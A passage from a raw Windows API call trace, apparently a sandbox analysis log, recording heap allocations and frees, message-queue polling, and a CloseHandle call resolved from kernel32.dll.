out: hHeap=0x8a0000) returned 1 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0198.164] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.165] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.165] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.165] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0198.167] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0198.167] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.168] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0198.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.169] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0198.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.170] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.170] CloseHandle (hObject=0x160) returned 1 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.172] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: 